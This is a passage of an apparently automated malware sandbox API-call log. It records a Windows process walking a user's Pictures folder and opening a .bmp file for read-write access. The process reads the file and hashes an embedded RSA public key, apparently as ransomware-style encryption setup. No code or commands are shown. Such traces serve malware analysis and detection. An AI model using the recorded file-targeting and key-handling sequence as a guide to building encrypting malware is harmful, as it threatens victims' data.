| out: hHeap=0x6a0000) returned 1 [0195.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.650] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\") returned="k4vLze9TyD\\" [0195.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.650] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\") returned="d7pQIdSiE6laiAyeoE\\" [0195.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0195.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.651] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0195.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42778 [0195.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.651] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0195.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42778 | out: hHeap=0x6a0000) returned 1 [0195.652] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.652] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.652] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.653] PathFindFileNameW (pszPath="") returned="" [0195.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.653] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\k4vlze9tyd\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7e97c00, ftCreationTime.dwHighDateTime=0x1d8a3bb, ftLastAccessTime.dwLowDateTime=0xe86d4c80, ftLastAccessTime.dwHighDateTime=0x1d8a530, ftLastWriteTime.dwLowDateTime=0xe86d4c80, ftLastWriteTime.dwHighDateTime=0x1d8a530, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0195.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.658] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7e97c00, ftCreationTime.dwHighDateTime=0x1d8a3bb, ftLastAccessTime.dwLowDateTime=0xe86d4c80, ftLastAccessTime.dwHighDateTime=0x1d8a530, ftLastWriteTime.dwLowDateTime=0xe86d4c80, ftLastWriteTime.dwHighDateTime=0x1d8a530, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.658] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf903fc00, ftCreationTime.dwHighDateTime=0x1d8a6bc, ftLastAccessTime.dwLowDateTime=0xf808ffc0, ftLastAccessTime.dwHighDateTime=0x1d8a6f4, ftLastWriteTime.dwLowDateTime=0xf808ffc0, ftLastWriteTime.dwHighDateTime=0x1d8a6f4, nFileSizeHigh=0x0, nFileSizeLow=0xfe8b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9GFEdyG-XmCwzgAwdH.bmp", cAlternateFileName="9GFEDY~1.BMP")) returned 1 [0195.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0195.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.658] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\9GFEdyG-XmCwzgAwdH.bmp") returned=".bmp" [0195.658] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\9GFEdyG-XmCwzgAwdH.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\k4vlze9tyd\\9gfedyg-xmcwzgawdh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.660] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=65163) returned 1 [0195.660] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.663] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xfe65, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.663] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.665] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.665] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xfe8b, lpOverlapped=0x0) returned 1 [0195.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.666] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0195.667] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.667] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.667] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.667] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.667] GetLastError () returned 0x0 [0195.667] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.667] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0195.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.668] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.668] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.668] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfe90) returned 0x2d4b778 [0195.668] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42778 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d427c0 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.669] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a198 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a180 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.672] GetCurrentThreadId () returned 0x264 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46cf0 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.673] GetCurrentThreadId () returned 0x264 [0195.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 